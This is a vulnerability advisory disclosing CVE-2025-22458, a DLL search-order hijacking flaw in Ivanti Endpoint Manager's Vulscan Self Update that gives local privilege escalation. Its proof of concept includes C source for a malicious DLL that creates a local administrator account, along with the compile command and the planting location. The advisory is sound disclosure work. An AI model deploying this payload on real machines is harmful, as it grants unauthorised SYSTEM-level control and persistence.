SEC Consult Vulnerability Lab Security Advisory < 20250422-0 >
=======================================================================
              title: Local Privilege Escalation via DLL Search Order Hijacking
            product: Ivanti Endpoint Manager Security Scan (Vulscan) Self 
Update
 vulnerable version: EPM 2022 SU6 and previous, EPM 2024
      fixed version: EPM 2022 SU7 and EPM 2024 SU1
         CVE number: CVE-2025-22458
             impact: High
           homepage: https://www.ivanti.com/
              found: 2025-02-07
                 by: Paul Serban (Eviden)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Eviden business
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"EPM Patch and Compliance Manager uses an auto update feature in order to make
sure that all vulnerability scanning files are up to date with the core 
server.
This ensures compatibility between the files and the latest definitions as 
well
as compatibility with the files on the core.  The Security Scan (Vulscan) is
what does the update."

Source: 
https://forums.ivanti.com/s/article/About-Patch-Manager-Self-Update?language=en_US


Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.


Vulnerability overview/description:
-----------------------------------
1) DLL Search Order Hijacking (CVE-2025-22458)
The EPM Security Scan (Vulscan) Self Update is vulnerable to DLL Hijacking.
When it is installed on a client machine, by default, it creates a scheduled
task as SYSTEM that when run, tries to load non-existent ZIP files from
ProgramData. A malicious DLL can be inserted into one of the ZIP files which
will be unzipped to and loaded from Program Files (x86) allowing malicious
actors with low privileges to escalate to SYSTEM and due to the recurrence
of the scheduled task, also gain persistence.


Proof of concept:
-----------------
1) DLL Search Order Hijacking (CVE-2025-22458)
In the screenshot below the scheduled task "LANDESK Agent Health Bootstrap 
Task"
is seen to be running as SYSTEM on the client machine.

<01_scheduled_task_as_system.png>

By default it is set to run daily at 9 PM.

<02_scheduled_task_recurrence.png>

This scheduled task runs the vulscan.exe binary that scans to make sure
that all vulnerability scanning files are up to date with the core Ivanti
server.

<03_scheduled_task_command.png>

Every scan run by this agent saves a log in the following location:

C:\ProgramData\LANDesk\Log\vulscan.log

The ProgramData folder allows any authenticated user to read and write
into it. While reading the log, the following lines indicate that some
files are not found.

Thu, 10 Feb 2025 21:00:19 Info: Core did not find file 
RebootBehavior_Apply.zip
Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
Thu, 10 Feb 2025 21:00:19 Info: Core did not find file 
AlertSettingsBehavior_Apply.zip
Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
Thu, 10 Feb 2025 21:00:19 Info: Core did not find file 
InventorySettingsBehavior_Apply.zip
Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
Thu, 10 Feb 2025 21:00:19 Info: Core did not find file 
ClientConnectivityBehavior_Apply.zip
Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
Thu, 10 Feb 2025 21:00:19 Info: Core did not find file 
PortalManagerBehavior_Apply.zip
Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
<snipped for brevity>
Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find 
"C:\ProgramData\vulScan\RebootBehavior_Apply.zip"
Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find 
"C:\ProgramData\vulScan\AlertSettingsBehavior_Apply.zip"
Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find 
"C:\ProgramData\vulScan\InventorySettingsBehavior_Apply.zip"
Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find 
"C:\ProgramData\vulScan\ClientConnectivityBehavior_Apply.zip"
Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find 
"C:\ProgramData\vulScan\PortalManagerBehavior_Apply.zip"
Thu, 10 Feb 2025 21:00:19 Self update: files are up to date.

It looks like it is trying to find certain zip archives. It first
searches on the Core Ivanti server, then it looks in the ProgramData
folder. Since it can't find them in either location, it concludes
that it is up to date.

Further down into the log it can be seen that it tries to unzip the
same zip files from the ProgramData folder. It can't find them and
then loads DLL files from Program Files (x86). These DLL files have
the same name as the zip file.

Thu, 10 Feb 2025 21:00:20 Checking whether to unzip 
'C:\ProgramData\vulScan\RebootBehavior_Apply.zip'.  Force: true
Thu, 10 Feb 2025 21:00:20 GetFileHash: could not find 
"C:\ProgramData\vulScan\RebootBehavior_Apply.zip"
Thu, 10 Feb 2025 21:00:20 Loading applier dll: 'C:\Program Files 
(x86)\LANDesk\LDClient\RebootBehavior_Apply.dll'
Thu, 10 Feb 2025 21:00:20 Check last error after load library.  Error: 126
Tue, 10 Feb 2025 21:00:36 Checking whether to unzip 
'C:\ProgramData\vulScan\AlertSettingsBehavior_Apply.zip'.  Force: false
Tue, 10 Feb 2025 21:00:36 GetFileHash: could not find 
"C:\ProgramData\vulScan\AlertSettingsBehavior_Apply.zip"
Tue, 10 Feb 2025 21:00:36 Loading applier dll: 'C:\Program Files 
(x86)\LANDesk\LDClient\AlertSettingsBehavior_Apply.dll'
Tue, 10 Feb 2025 21:00:36 'PreApplyBehavior' is not in 'C:\Program Files 
(x86)\LANDesk\LDClient\AlertSettingsBehavior_Apply.dll'
Tue, 10 Feb 2025 21:00:36 Calling 'ApplyBehavior' in 'C:\Program Files 
(x86)\LANDesk\LDClient\AlertSettingsBehavior_Apply.dll'
Tue, 10 Feb 2025 21:00:36 Checking whether to unzip 
'C:\ProgramData\vulScan\InventorySettingsBehavior_Apply.zip'.  Force: false
Tue, 10 Feb 2025 21:00:36 GetFileHash: could not find 
"C:\ProgramData\vulScan\InventorySettingsBehavior_Apply.zip"
Tue, 10 Feb 2025 21:00:36 Loading applier dll: 'C:\Program Files 
(x86)\LANDesk\LDClient\InventorySettingsBehavior_Apply.dll'
Tue, 10 Feb 2025 21:00:37 'PreApplyBehavior' is not in 'C:\Program Files 
(x86)\LANDesk\LDClient\InventorySettingsBehavior_Apply.dll'
Tue, 10 Feb 2025 21:00:37 Calling 'ApplyBehavior' in 'C:\Program Files 
(x86)\LANDesk\LDClient\InventorySettingsBehavior_Apply.dll'
Tue, 10 Feb 2025 21:00:38 Checking whether to unzip 
'C:\ProgramData\vulScan\ClientConnectivityBehavior_Apply.zip'.  Force: false
Tue, 10 Feb 2025 21:00:38 GetFileHash: could not find 
"C:\ProgramData\vulScan\ClientConnectivityBehavior_Apply.zip"
Tue, 10 Feb 2025 21:00:38 Loading applier dll: 'C:\Program Files 
(x86)\LANDesk\LDClient\ClientConnectivityBehavior_Apply.dll'
Tue, 10 Feb 2025 21:00:38 Calling 'PreApplyBehavior' in 'C:\Program Files 
(x86)\LANDesk\LDClient\ClientConnectivityBehavior_Apply.dll'
<snipped for brevity>
Wed, 10 Feb 2025 21:01:42 Checking whether to unzip 
'C:\ProgramData\vulScan\PortalManagerBehavior_Apply.zip'.  Force: false
Wed, 10 Feb 2025 21:01:42 GetFileHash: could not find 
"C:\ProgramData\vulScan\PortalManagerBehavior_Apply.zip"
Wed, 10 Feb 2025 21:01:42 Loading applier dll: 'C:\Program Files 
(x86)\LANDesk\LDClient\PortalManagerBehavior_Apply.dll'
Wed, 10 Feb 2025 21:01:44 'PreApplyBehavior' is not in 'C:\Program Files 
(x86)\LANDesk\LDClient\PortalManagerBehavior_Apply.dll'
Wed, 10 Feb 2025 21:01:44 Calling 'ApplyBehavior' in 'C:\Program Files 
(x86)\LANDesk\LDClient\PortalManagerBehavior_Apply.dll'

The Program Files (x86) folder already contains all the DLL files it looks 
for,
with one exception. It doesn't contain the RebootBehavior_Apply.dll file.

<04_rebootdll_missing.png>

Because the zip files in question don't exist in ProgramData, a low privileged
user can create them.

<05_maliciousZIP_lowprivuser.png>

The RebootBehavior_Apply.zip file could, for example, contain a 
RebootBehavior_Apply.dll that,
when loaded, will create a new user and add it to the local administrators 
group.
This was the chosen zip file name because it is the first one searched for by
the scan. However, any of the other ones can be used. The DLL will still be
created, the only difference will be that a second scan will be required for
it to reach the stage where it tries to load RebootBehaviour_Apply.dll again.

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

void Entry() {
    system("cmd.exe /C net user secconsult P@ssW0rd1sSup3rS6curE /add /Y");
    system("cmd.exe /C net localgroup administrators secconsult /add");
}

__declspec(dllexport) void PreApplyBehavior() {
    Entry();
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID 
lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Entry, 0, 0, 0);
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}


Notice the "PreApplyBehavior" exported function which just calls the malicious
commands. This is a required function that is searched for when the 
vulscan.exe
tries to apply the DLL. It was compiled using the syntax below.

i686-w64-mingw32-gcc poc.c -shared -o RebootBehavior_Apply.dll

When the scheduled task runs, it finds the malicious ZIP file and successfully
unzips it in 'C:\Program Files (x86)\LANDesk\LDClient\' and immediately loads 
it.

Tue, 11 Feb 2025 21:02:52 Checking whether to unzip 
'C:\ProgramData\vulScan\RebootBehavior_Apply.zip'.  Force: false
Tue, 11 Feb 2025 21:02:52 Unzipping
Tue, 11 Feb 2025 21:02:52 Unzip 
'C:\ProgramData\vulScan\RebootBehavior_Apply.zip' to directory 'C:\Program 
Files (x86)\LANDesk\LDClient\'
Tue, 11 Feb 2025 21:03:03 Successfully unzipped
Tue, 11 Feb 2025 21:03:03 Loading applier dll: 'C:\Program Files 
(x86)\LANDesk\LDClient\RebootBehavior_Apply.dll'
Tue, 11 Feb 2025 21:03:03 Calling 'PreApplyBehavior' in 'C:\Program Files 
(x86)\LANDesk\LDClient\RebootBehavior_Apply.dll'

The malicious DLL file was created as SYSTEM:

<06_maliciousDLL_created_as_SYSTEM.png>

Checking the local users, it is confirmed that the new secconsult local
administrator has been created.

<07_secconsult_user_created.png>

As long as the malicious RebootBehavior_Apply.dll exists in
'C:\Program Files (x86)\LANDesk\LDClient\', the scheduled task will try to
load it each time thus giving an attacker a stealthy persistence mechanism.


Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the latest version available
at the time of the test:
* 11.0.5.2795

Affected versions as indicated by the vendor are EMP 2024 and EPM 2022 SU6 and 
all its previous versions.

Vendor contact timeline:
------------------------
2025-02-13: Contacting vendor via email.
2025-02-18: Vendor confirmed that advisory was received.
2025-02-19: Acknowledged the vendor response.
2025-03-04: Asking for a status update.
2025-03-04: Ivanti is working on a fix and testing it already, but will
            not make it as part of March Patch Tuesday.
2025-03-24: Ivanti has developed a fix and plans to release it as part of
            April Patch Tuesday disclosures (4/8/25).
2025-04-08: Vendor publishes security advisory
2025-04-22: Coordinated disclosure of security advisory


Solution:
---------
The vendor provides a patch which can be downloaded from the following URL: 
https://portal.ivanti.com.
Vendor Advisory: 
https://forums.ivanti.com/s/article/Security-Advisory-EPM-April-2025-for-EPM-2024-and-EPM-2022-SU6?language=en_US


Workaround:
-----------
None


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
X: https://x.com/sec_consult

EOF Paul Serban / @2025